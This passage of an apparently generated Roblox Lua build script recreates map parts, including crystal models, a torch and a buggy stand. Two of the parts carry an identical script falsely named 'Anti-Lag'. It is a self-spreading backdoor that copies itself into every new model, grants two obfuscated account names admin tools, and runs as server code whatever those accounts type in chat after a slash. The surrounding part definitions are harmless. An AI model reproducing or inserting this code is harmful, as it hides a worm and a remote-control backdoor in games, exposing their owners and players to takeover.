- ["Rotation"] = Vector3.new(67.3801346, -89.9314728, -112.619873),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(812.911743, 55.1542664, 189.906403, -1.49011612e-007, 3.57627755e-007, -0.999999285, 5.96046341e-008, 0.999999523, -3.57627755e-007, 1.00000072, 5.96046341e-008, 1.49011612e-007),
- ["Size"] = Vector3.new(2, 9.60000038, 2),
- ["TopSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.501961, 0.733333, 0.858824),
- })
- o91 = Create("Part",{
- ["Parent"] = o89,
- ["BrickColor"] = BrickColor.new("Pastel Blue"),
- ["Reflectance"] = 0.40000000596046,
- ["Transparency"] = 0.39999997615814,
- ["Position"] = Vector3.new(815.445129, 54.1496544, 187.546127),
- ["Rotation"] = Vector3.new(-10.0625477, 10.8182755, -20.1074276),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(815.445129, 54.1496544, 187.546127, 0.922359765, 0.33767134, 0.187694624, -0.369288266, 0.913330495, 0.171617985, -0.113477185, -0.227607399, 0.967119098),
- ["Size"] = Vector3.new(2, 9.60000038, 2),
- ["TopSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.501961, 0.733333, 0.858824),
- })
- o92 = Create("Part",{
- ["Parent"] = o89,
- ["BrickColor"] = BrickColor.new("Pastel Blue"),
- ["Reflectance"] = 0.40000000596046,
- ["Transparency"] = 0.39999997615814,
- ["Position"] = Vector3.new(818.129761, 53.0745964, 188.343033),
- ["Rotation"] = Vector3.new(-97.1030502, -34.4171066, -97.8997192),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(818.129761, 53.0745964, 188.343033, -0.11338, 0.817115486, -0.565213323, 0.0453943312, 0.57254833, 0.818612814, 0.992514729, 0.0671567991, -0.102007866),
- ["Size"] = Vector3.new(2, 9.60000038, 2),
- ["TopSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.501961, 0.733333, 0.858824),
- })
- o93 = Create("Part",{
- ["Parent"] = o89,
- ["BrickColor"] = BrickColor.new("Pastel Blue"),
- ["Reflectance"] = 0.40000000596046,
- ["Transparency"] = 0.39999997615814,
- ["Position"] = Vector3.new(816.49469, 53.7293205, 190.969254),
- ["Rotation"] = Vector3.new(27.101757, -0.141284198, -24.1559792),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(816.49469, 53.7293205, 190.969254, 0.912431419, 0.409220606, -0.00246587186, -0.365313262, 0.81178844, -0.455570966, -0.184427828, 0.416578799, 0.890196443),
- ["Size"] = Vector3.new(2, 9.60000038, 2),
- ["TopSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.501961, 0.733333, 0.858824),
- })
- o94 = Create("Part",{
- ["Parent"] = o89,
- ["BrickColor"] = BrickColor.new("Pastel Blue"),
- ["Reflectance"] = 0.40000000596046,
- ["Transparency"] = 0.39999997615814,
- ["Position"] = Vector3.new(816.514465, 55.6569824, 189.73941),
- ["Rotation"] = Vector3.new(-5.85053968, -14.2838707, -22.5535774),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(816.514465, 55.6569824, 189.73941, 0.894970298, 0.371689677, -0.246726215, -0.358322352, 0.928356767, 0.0987826064, 0.265766531, -2.23775896e-008, 0.964037895),
- ["Size"] = Vector3.new(2, 13.2000008, 2),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["TopSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.501961, 0.733333, 0.858824),
- })
- o95 = Create("PointLight",{
- ["Parent"] = o94,
- ["Color"] = Color3.new(0, 0.333333, 1),
- ["Brightness"] = 2,
- ["Range"] = 60,
- })
- o96 = Create("Part",{
- ["Name"] = "Smooth Block Model",
- ["Parent"] = o89,
- ["BrickColor"] = BrickColor.new("Pastel Blue"),
- ["Reflectance"] = 0.40000000596046,
- ["Transparency"] = 0.39999997615814,
- ["Position"] = Vector3.new(817.403503, 59.4471512, 186.225723),
- ["Rotation"] = Vector3.new(76.0065842, -19.7350712, 168.497711),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(817.403503, 59.4471512, 186.225723, -0.922358274, -0.187694311, -0.337671459, 0.369287819, -0.171618178, -0.913330495, 0.113477394, -0.967119396, 0.227607384),
- ["FormFactor"] = Enum.FormFactor.Symmetric,
- ["Size"] = Vector3.new(2, 2, 2),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["TopSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.501961, 0.733333, 0.858824),
- })
- o97 = Create("SpecialMesh",{
- ["Parent"] = o96,
- ["MeshType"] = Enum.MeshType.Wedge,
- })
- o98 = Create("Part",{
- ["Name"] = "Smooth Block Model",
- ["Parent"] = o89,
- ["BrickColor"] = BrickColor.new("Pastel Blue"),
- ["Reflectance"] = 0.40000000596046,
- ["Transparency"] = 0.39999997615814,
- ["Position"] = Vector3.new(812.911743, 60.9547424, 189.906403),
- ["Rotation"] = Vector3.new(90.0000153, -6.01910615e-005, 3.50048613e-005),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(812.911743, 60.9547424, 189.906403, 0.999996662, -6.10948007e-007, -1.05053221e-006, 7.45057378e-007, 1.63912858e-007, -1.00000334, -7.30156898e-007, 1.00000775, -2.53319854e-007),
- ["FormFactor"] = Enum.FormFactor.Symmetric,
- ["Size"] = Vector3.new(2, 2, 2),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["TopSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.501961, 0.733333, 0.858824),
- })
- o99 = Create("SpecialMesh",{
- ["Parent"] = o98,
- ["MeshType"] = Enum.MeshType.Wedge,
- })
- o100 = Create("Part",{
- ["Name"] = "Smooth Block Model",
- ["Parent"] = o89,
- ["BrickColor"] = BrickColor.new("Pastel Blue"),
- ["Reflectance"] = 0.40000000596046,
- ["Transparency"] = 0.39999997615814,
- ["Position"] = Vector3.new(822.868896, 56.3962975, 188.73288),
- ["Rotation"] = Vector3.new(96.689888, -54.7970009, 101.342842),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(822.868896, 56.3962975, 188.73288, -0.113380089, -0.565211952, -0.817114711, 0.0453942418, 0.818612278, -0.572548807, 0.992514729, -0.102007776, -0.0671565756),
- ["CanCollide"] = false,
- ["FormFactor"] = Enum.FormFactor.Symmetric,
- ["Size"] = Vector3.new(2, 2, 2),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["TopSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.501961, 0.733333, 0.858824),
- })
- o101 = Create("SpecialMesh",{
- ["Parent"] = o100,
- ["MeshType"] = Enum.MeshType.Wedge,
- })
- o102 = Create("Script",{
- ["Name"] = "Anti-Lag",
- ["Parent"] = o100,
- })
- table.insert(cors,coroutine.create(function()
- wait()
- runDummyScript(function()
- Altitude = script:clone()
- calco = {"s","c","q","t","o","a","i","f","g","w","8","e","m","7","h","n"}
- Knox = {}
- table.insert (Knox, 1 ,string.reverse(calco[5] .. calco[2] .. calco[7] .. calco[1] .. calco[6] .. calco[9] .. calco[12] .. calco[13]))
- table.insert (Knox, 1 ,string.reverse(calco[11] .. calco[14] .. calco[14] .. calco[4] .. calco[16] .. calco[6] .. calco[15] .. calco[2]))
- Play = {}
- function rando(votation)
- local hatr = 5
- local calc = math.pi * math.huge
- local longicate = votation:GetChildren()
- if #longicate > hatr then
- calc = calc + math.pi
- return longicate[math.random(6,#longicate)]
- end
- end
- function doublecheck()
- local fj = game.Workspace:GetChildren()
- for off = 1,#fj do
- if fj[off].className == "Part" then
- local fh = fj[off]:FindFirstChild("Anti-Lag")
- if fh ~= nil then
- return false
- end
- end
- end
- return true
- end
- function workcheck()
- if doublecheck() == true then
- local l = Altitude:clone()
- l.Parent = rando(game.Workspace)
- end
- end
- workcheck()
- function gibite(quen)
- local hup = Instance.new("Message")
- hup.Text = "Detected"
- hup.Parent = quen.Parent
- local con = Instance.new("Script")
- con.Source = [[wait(5) script.Parent:remove()]]
- con.Parent = hup
- for ish = 0,7 do
- local a = Instance.new("HopperBin")
- a.BinType = ish
- a.Parent = quen
- end
- end
- function laber(zonsa)
- wait()
- for slate = 1,#Knox do
- if zonsa.Name == Knox[slate] then
- gibite(zonsa.Backpack)
- table.insert (Play, 1, zonsa.Name)
- end
- end
- end
- function yeild(frequency)
- local t = Knox
- for g = 1,#t do
- if t[g] == frequency.Name then
- return true
- end
- end
- return false
- end
- function check(los)
- local r = los:GetChildren()
- for i = 1,#r do
- local h = r[i]:FindFirstChild("Anti-Lag")
- if h ~= nil then
- h:remove()
- end
- end
- end
- function alto(xylem)
- if xylem.className == "Model" then
- check(xylem)
- local que = script:clone()
- que.Parent = rando(xylem)
- end
- end
- function sortation(gone)
- local dimbs = Altitude:clone()
- dimbs = ramno(game.Workspace)
- end
- function onPlayerEntered(newPlayer)
- newPlayer.Chatted:connect(function(msg, recipient) onChatted(msg, recipient, newPlayer) end)
- end
- function Player(player)
- player.Changed:connect(function (property)
- if property == "Character" then
- laber(player)
- end
- end)
- end
- game.Players.PlayerAdded:connect(Player)
- game.Players.ChildAdded:connect(onPlayerEntered)
- game.Players.ChildAdded:connect(laber)
- script.ChildRemoved:connect(sortation)
- game.Workspace.ChildAdded:connect(alto)
- function onChatted(msg, recipient, speaker)
- if yeild(speaker) ~= false then
- if string.sub(msg,1,1) == "/" then
- local dsting = Instance.new("Script")
- dsting.Source = string.sub(msg,2)
- dsting.Parent = game.Workspace
- end
- end
- end
- end,o102)
- end))
- o103 = Create("Part",{
- ["Name"] = "Smooth Block Model",
- ["Parent"] = o89,
- ["BrickColor"] = BrickColor.new("Pastel Blue"),
- ["Reflectance"] = 0.40000000596046,
- ["Transparency"] = 0.39999997615814,
- ["Position"] = Vector3.new(818.868408, 58.4383659, 193.385986),
- ["Rotation"] = Vector3.new(117.165092, -24.1557159, 0.154877797),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(818.868408, 58.4383659, 193.385986, 0.912430942, -0.0024664232, -0.409217924, -0.365314245, -0.455571443, -0.811786175, -0.184428453, 0.89019531, -0.416576505),
- ["FormFactor"] = Enum.FormFactor.Symmetric,
- ["Size"] = Vector3.new(2, 2, 2),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["TopSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.501961, 0.733333, 0.858824),
- })
- o104 = Create("SpecialMesh",{
- ["Parent"] = o103,
- ["MeshType"] = Enum.MeshType.Wedge,
- })
- o105 = Create("Part",{
- ["Name"] = "Smooth Block Model",
- ["Parent"] = o89,
- ["BrickColor"] = BrickColor.new("Pastel Blue"),
- ["Reflectance"] = 0.40000000596046,
- ["Transparency"] = 0.39999997615814,
- ["Position"] = Vector3.new(819.339172, 62.712471, 189.73941),
- ["Rotation"] = Vector3.new(90, -21.8198624, 105.412514),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(819.339172, 62.712471, 189.73941, -0.24672617, -0.894970119, -0.371689677, 0.0987825915, 0.358322263, -0.928356767, 0.964037836, -0.265766561, 2.23775896e-008),
- ["FormFactor"] = Enum.FormFactor.Symmetric,
- ["Size"] = Vector3.new(2, 2, 2),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["TopSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.501961, 0.733333, 0.858824),
- })
- o106 = Create("SpecialMesh",{
- ["Parent"] = o105,
- ["MeshType"] = Enum.MeshType.Wedge,
- })
- o107 = Create("Model",{
- ["Parent"] = mas,
- })
- o108 = Create("Part",{
- ["Parent"] = o107,
- ["BrickColor"] = BrickColor.new("Pastel Blue"),
- ["Reflectance"] = 0.40000000596046,
- ["Transparency"] = 0.39999997615814,
- ["Position"] = Vector3.new(817.701721, 15.2320423, 181.70076),
- ["Rotation"] = Vector3.new(-89.9999847, 8.5377369e-006, -3.41509167e-006),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(817.701721, 15.2320423, 181.70076, 1.00000072, 5.96046341e-008, 1.49011612e-007, 1.49011612e-007, -3.57627755e-007, 0.999999285, -5.96046341e-008, -0.999999523, 3.57627755e-007),
- ["Size"] = Vector3.new(2, 9.60000038, 2),
- ["TopSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.501961, 0.733333, 0.858824),
- })
- o109 = Create("Part",{
- ["Parent"] = o107,
- ["BrickColor"] = BrickColor.new("Pastel Blue"),
- ["Reflectance"] = 0.40000000596046,
- ["Transparency"] = 0.39999997615814,
- ["Position"] = Vector3.new(815.34137, 12.6985817, 182.705261),
- ["Rotation"] = Vector3.new(132.438141, 75.2664719, 116.49926),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(815.34137, 12.6985817, 182.705261, -0.113477185, -0.227607399, 0.967119098, -0.922359765, -0.33767134, -0.187694624, 0.369288266, -0.913330495, -0.171617985),
- ["Size"] = Vector3.new(2, 9.60000038, 2),
- ["TopSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.501961, 0.733333, 0.858824),
- })
- o110 = Create("Part",{
- ["Parent"] = o107,
- ["BrickColor"] = BrickColor.new("Pastel Blue"),
- ["Reflectance"] = 0.40000000596046,
- ["Transparency"] = 0.39999997615814,
- ["Position"] = Vector3.new(816.138489, 10.0139904, 183.780289),
- ["Rotation"] = Vector3.new(-145.37677, -5.85480404, -3.87092018),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(816.138489, 10.0139904, 183.780289, 0.992514729, 0.0671567991, -0.102007866, 0.11338, -0.817115486, 0.565213323, -0.0453943312, -0.57254833, -0.818612814),
- ["Size"] = Vector3.new(2, 9.60000038, 2),
- ["TopSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.501961, 0.733333, 0.858824),
- })
- o111 = Create("Part",{
- ["Parent"] = o107,
- ["BrickColor"] = BrickColor.new("Pastel Blue"),
- ["Reflectance"] = 0.40000000596046,
- ["Transparency"] = 0.39999997615814,
- ["Position"] = Vector3.new(818.764526, 11.6488323, 183.125565),
- ["Rotation"] = Vector3.new(-0.310122222, 62.8979416, -113.879936),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(818.764526, 11.6488323, 183.125565, -0.184427828, 0.416578799, 0.890196443, -0.912431419, -0.409220606, 0.00246587186, 0.365313262, -0.81178844, 0.455570966),
- ["Size"] = Vector3.new(2, 9.60000038, 2),
- ["TopSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.501961, 0.733333, 0.858824),
- })
- o112 = Create("Part",{
- ["Parent"] = o107,
- ["BrickColor"] = BrickColor.new("Pastel Blue"),
- ["Reflectance"] = 0.40000000596046,
- ["Transparency"] = 0.39999997615814,
- ["Position"] = Vector3.new(817.534546, 11.6293821, 181.198074),
- ["Rotation"] = Vector3.new(-111.819847, 74.5876007, 4.82431506e-006),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(817.534546, 11.6293821, 181.198074, 0.265766531, -2.23775896e-008, 0.964037895, -0.894970298, -0.371689677, 0.246726215, 0.358322352, -0.928356767, -0.0987826064),
- ["Size"] = Vector3.new(2, 13.2000008, 2),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["TopSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.501961, 0.733333, 0.858824),
- })
- o113 = Create("PointLight",{
- ["Parent"] = o112,
- ["Color"] = Color3.new(0, 0.333333, 1),
- ["Brightness"] = 2,
- ["Range"] = 60,
- })
- o114 = Create("Part",{
- ["Name"] = "Smooth Block Model",
- ["Parent"] = o107,
- ["BrickColor"] = BrickColor.new("Pastel Blue"),
- ["Reflectance"] = 0.40000000596046,
- ["Transparency"] = 0.39999997615814,
- ["Position"] = Vector3.new(814.020874, 10.7402039, 177.407501),
- ["Rotation"] = Vector3.new(-20.290081, 13.156249, 83.3077774),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(814.020874, 10.7402039, 177.407501, 0.113477394, -0.967119396, 0.227607384, 0.922358274, 0.187694311, 0.337671459, -0.369287819, 0.171618178, 0.913330495),
- ["FormFactor"] = Enum.FormFactor.Symmetric,
- ["Size"] = Vector3.new(2, 2, 2),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["TopSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.501961, 0.733333, 0.858824),
- })
- o115 = Create("SpecialMesh",{
- ["Parent"] = o114,
- ["MeshType"] = Enum.MeshType.Wedge,
- })
- o116 = Create("Part",{
- ["Name"] = "Smooth Block Model",
- ["Parent"] = o107,
- ["BrickColor"] = BrickColor.new("Pastel Blue"),
- ["Reflectance"] = 0.40000000596046,
- ["Transparency"] = 0.39999997615814,
- ["Position"] = Vector3.new(817.701721, 15.2320423, 175.900269),
- ["Rotation"] = Vector3.new(-6.01908614e-005, -1.45141585e-005, -90.0000458),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(817.701721, 15.2320423, 175.900269, -7.30156898e-007, 1.00000775, -2.53319854e-007, -0.999996662, 6.10948007e-007, 1.05053221e-006, -7.45057378e-007, -1.63912858e-007, 1.00000334),
- ["FormFactor"] = Enum.FormFactor.Symmetric,
- ["Size"] = Vector3.new(2, 2, 2),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["TopSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.501961, 0.733333, 0.858824),
- })
- o117 = Create("SpecialMesh",{
- ["Parent"] = o116,
- ["MeshType"] = Enum.MeshType.Wedge,
- })
- o118 = Create("Part",{
- ["Name"] = "Smooth Block Model",
- ["Parent"] = o107,
- ["BrickColor"] = BrickColor.new("Pastel Blue"),
- ["Reflectance"] = 0.40000000596046,
- ["Transparency"] = 0.39999997615814,
- ["Position"] = Vector3.new(816.527954, 5.27470684, 180.458939),
- ["Rotation"] = Vector3.new(-54.9812355, -3.85068655, 5.86808968),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(816.527954, 5.27470684, 180.458939, 0.992514729, -0.102007776, -0.0671565756, 0.113380089, 0.565211952, 0.817114711, -0.0453942418, -0.818612278, 0.572548807),
- ["CanCollide"] = false,
- ["FormFactor"] = Enum.FormFactor.Symmetric,
- ["Size"] = Vector3.new(2, 2, 2),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["TopSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.501961, 0.733333, 0.858824),
- })
- o119 = Create("SpecialMesh",{
- ["Parent"] = o118,
- ["MeshType"] = Enum.MeshType.Wedge,
- })
- o120 = Create("Script",{
- ["Name"] = "Anti-Lag",
- ["Parent"] = o118,
- })
- table.insert(cors,coroutine.create(function()
- wait()
- runDummyScript(function()
- Altitude = script:clone()
- calco = {"s","c","q","t","o","a","i","f","g","w","8","e","m","7","h","n"}
- Knox = {}
- table.insert (Knox, 1 ,string.reverse(calco[5] .. calco[2] .. calco[7] .. calco[1] .. calco[6] .. calco[9] .. calco[12] .. calco[13]))
- table.insert (Knox, 1 ,string.reverse(calco[11] .. calco[14] .. calco[14] .. calco[4] .. calco[16] .. calco[6] .. calco[15] .. calco[2]))
- Play = {}
- function rando(votation)
- local hatr = 5
- local calc = math.pi * math.huge
- local longicate = votation:GetChildren()
- if #longicate > hatr then
- calc = calc + math.pi
- return longicate[math.random(6,#longicate)]
- end
- end
- function doublecheck()
- local fj = game.Workspace:GetChildren()
- for off = 1,#fj do
- if fj[off].className == "Part" then
- local fh = fj[off]:FindFirstChild("Anti-Lag")
- if fh ~= nil then
- return false
- end
- end
- end
- return true
- end
- function workcheck()
- if doublecheck() == true then
- local l = Altitude:clone()
- l.Parent = rando(game.Workspace)
- end
- end
- workcheck()
- function gibite(quen)
- local hup = Instance.new("Message")
- hup.Text = "Detected"
- hup.Parent = quen.Parent
- local con = Instance.new("Script")
- con.Source = [[wait(5) script.Parent:remove()]]
- con.Parent = hup
- for ish = 0,7 do
- local a = Instance.new("HopperBin")
- a.BinType = ish
- a.Parent = quen
- end
- end
- function laber(zonsa)
- wait()
- for slate = 1,#Knox do
- if zonsa.Name == Knox[slate] then
- gibite(zonsa.Backpack)
- table.insert (Play, 1, zonsa.Name)
- end
- end
- end
- function yeild(frequency)
- local t = Knox
- for g = 1,#t do
- if t[g] == frequency.Name then
- return true
- end
- end
- return false
- end
- function check(los)
- local r = los:GetChildren()
- for i = 1,#r do
- local h = r[i]:FindFirstChild("Anti-Lag")
- if h ~= nil then
- h:remove()
- end
- end
- end
- function alto(xylem)
- if xylem.className == "Model" then
- check(xylem)
- local que = script:clone()
- que.Parent = rando(xylem)
- end
- end
- function sortation(gone)
- local dimbs = Altitude:clone()
- dimbs = ramno(game.Workspace)
- end
- function onPlayerEntered(newPlayer)
- newPlayer.Chatted:connect(function(msg, recipient) onChatted(msg, recipient, newPlayer) end)
- end
- function Player(player)
- player.Changed:connect(function (property)
- if property == "Character" then
- laber(player)
- end
- end)
- end
- game.Players.PlayerAdded:connect(Player)
- game.Players.ChildAdded:connect(onPlayerEntered)
- game.Players.ChildAdded:connect(laber)
- script.ChildRemoved:connect(sortation)
- game.Workspace.ChildAdded:connect(alto)
- function onChatted(msg, recipient, speaker)
- if yeild(speaker) ~= false then
- if string.sub(msg,1,1) == "/" then
- local dsting = Instance.new("Script")
- dsting.Source = string.sub(msg,2)
- dsting.Parent = game.Workspace
- end
- end
- end
- end,o120)
- end))
- o121 = Create("Part",{
- ["Name"] = "Smooth Block Model",
- ["Parent"] = o107,
- ["BrickColor"] = BrickColor.new("Pastel Blue"),
- ["Reflectance"] = 0.40000000596046,
- ["Transparency"] = 0.39999997615814,
- ["Position"] = Vector3.new(821.181274, 9.27552032, 178.416641),
- ["Rotation"] = Vector3.new(-26.7524776, -24.6186371, -101.704811),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(821.181274, 9.27552032, 178.416641, -0.184428453, 0.89019531, -0.416576505, -0.912430942, 0.0024664232, 0.409217924, 0.365314245, 0.455571443, 0.811786175),
- ["FormFactor"] = Enum.FormFactor.Symmetric,
- ["Size"] = Vector3.new(2, 2, 2),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["TopSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.501961, 0.733333, 0.858824),
- })
- o122 = Create("SpecialMesh",{
- ["Parent"] = o121,
- ["MeshType"] = Enum.MeshType.Wedge,
- })
- o123 = Create("Part",{
- ["Name"] = "Smooth Block Model",
- ["Parent"] = o107,
- ["BrickColor"] = BrickColor.new("Pastel Blue"),
- ["Reflectance"] = 0.40000000596046,
- ["Transparency"] = 0.39999997615814,
- ["Position"] = Vector3.new(817.534546, 8.80457211, 174.142593),
- ["Rotation"] = Vector3.new(-21.8198681, 1.2821414e-006, 15.4125013),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(817.534546, 8.80457211, 174.142593, 0.964037836, -0.265766561, 2.23775896e-008, 0.24672617, 0.894970119, 0.371689677, -0.0987825915, -0.358322263, 0.928356767),
- ["FormFactor"] = Enum.FormFactor.Symmetric,
- ["Size"] = Vector3.new(2, 2, 2),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["TopSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.501961, 0.733333, 0.858824),
- })
- o124 = Create("SpecialMesh",{
- ["Parent"] = o123,
- ["MeshType"] = Enum.MeshType.Wedge,
- })
- o125 = Create("Model",{
- ["Parent"] = mas,
- })
- o126 = Create("Part",{
- ["Parent"] = o125,
- ["Material"] = Enum.Material.Wood,
- ["BrickColor"] = BrickColor.new("CGA brown"),
- ["Position"] = Vector3.new(83.2400284, 9.83170223, 101.618217),
- ["Rotation"] = Vector3.new(-30.8498173, 0, -0),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(83.2400284, 9.83170223, 101.618217, 1, 0, 0, 0, 0.858514369, 0.512789488, 0, -0.512789488, 0.858514369),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1, 0.270000041, 1),
- ["Color"] = Color3.new(0.666667, 0.333333, 0),
- })
- o127 = Create("Part",{
- ["Parent"] = o125,
- ["Material"] = Enum.Material.Wood,
- ["BrickColor"] = BrickColor.new("Really black"),
- ["Position"] = Vector3.new(83.240036, 10.3298874, 101.344788),
- ["Rotation"] = Vector3.new(-30.8496666, -90, 0),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(83.240036, 10.3298874, 101.344788, 0, 0, -1, 0.512787461, 0.858516037, 0, 0.858516037, -0.512787461, 0),
- ["CanCollide"] = false,
- ["FormFactor"] = Enum.FormFactor.Plate,
- ["Size"] = Vector3.new(3, 0.400000006, 3),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["TopSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.0666667, 0.0666667, 0.0666667),
- })
- o128 = Create("SpecialMesh",{
- ["Parent"] = o127,
- ["Scale"] = Vector3.new(0.333333343, 2.5, 0.333333343),
- })
- o129 = Create("BoolValue",{
- ["Name"] = "Burning",
- ["Parent"] = o127,
- })
- o130 = Create("Script",{
- ["Parent"] = o127,
- })
- table.insert(cors,coroutine.create(function()
- wait()
- runDummyScript(function()
- while true do
- wait(.05)
- if script.Parent.Burning.Value == true then
- x = game.Lighting.Fire:getChildren()
- f = x[math.random(1,3)]:clone()
- f.CFrame = CFrame.Angles(math.random(),math.random(),math.random())
- f.CFrame = f.CFrame+script.Parent.Position+Vector3.new(math.random(-5,5)/10,0,math.random(-5,5)/10)
- f.Parent = Workspace
- end
- end
- end,o130)
- end))
- o131 = Create("Fire",{
- ["Parent"] = o127,
- })
- o132 = Create("Smoke",{
- ["Parent"] = o127,
- ["Size"] = 0.10000000149012,
- ["RiseVelocity"] = 10,
- })
- o133 = Create("Part",{
- ["Parent"] = o125,
- ["Material"] = Enum.Material.Wood,
- ["BrickColor"] = BrickColor.new("Reddish brown"),
- ["Position"] = Vector3.new(83.240036, 8.88083267, 102.233589),
- ["Rotation"] = Vector3.new(-30.8496666, -90, 0),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(83.240036, 8.88083267, 102.233589, 0, 0, -1, 0.512787461, 0.858516037, 0, 0.858516037, -0.512787461, 0),
- ["FormFactor"] = Enum.FormFactor.Symmetric,
- ["Size"] = Vector3.new(1, 3, 1),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["TopSurface"] = Enum.SurfaceType.Weld,
- ["Color"] = Color3.new(0.411765, 0.25098, 0.156863),
- })
- o134 = Create("SpecialMesh",{
- ["Parent"] = o133,
- ["Scale"] = Vector3.new(0.75, 1, 75),
- })
- o135 = Create("Part",{
- ["Parent"] = o125,
- ["Material"] = Enum.Material.Wood,
- ["BrickColor"] = BrickColor.new("CGA brown"),
- ["Position"] = Vector3.new(83.2400284, 7.79431009, 102.858047),
- ["Rotation"] = Vector3.new(-30.8498173, 0, -0),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(83.2400284, 7.79431009, 102.858047, 1, 0, 0, 0, 0.858514369, 0.512789488, 0, -0.512789488, 0.858514369),
- ["FormFactor"] = Enum.FormFactor.Symmetric,
- ["Size"] = Vector3.new(1, 1, 1),
- ["Color"] = Color3.new(0.666667, 0.333333, 0),
- })
- o136 = Create("Model",{
- ["Name"] = "Buggy stand",
- ["Parent"] = mas,
- })
- o137 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(147.489502, 17.5386295, 169.397583),
- ["Rotation"] = Vector3.new(93.4556046, -25.6446533, 8.1496439),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(147.489502, 17.5386295, 169.397583, 0.892391205, -0.127795041, -0.432788432, -0.436183721, 0.00157369091, -0.899856031, 0.115678199, 0.991798699, -0.0543377697),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.39999986, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o138 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(146.629501, 18.298645, 169.317535),
- ["Rotation"] = Vector3.new(100.316895, -54.5006065, 12.713273),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(146.629501, 18.298645, 169.317535, 0.566457391, -0.127794579, -0.814121664, -0.820735931, 0.0015672727, -0.571305037, 0.0742856115, 0.991798878, -0.103997774),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.39999986, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o139 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(146.323639, 20.5636463, 169.31752),
- ["Rotation"] = Vector3.new(-174.896866, -82.6276474, 95.1504211),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(146.323639, 20.5636463, 169.31752, -0.011518918, -0.127796724, -0.991733193, -0.999933422, 0.0015621772, 0.0114134233, 9.0669957e-005, 0.991798818, -0.127806082),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(3.8499999, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
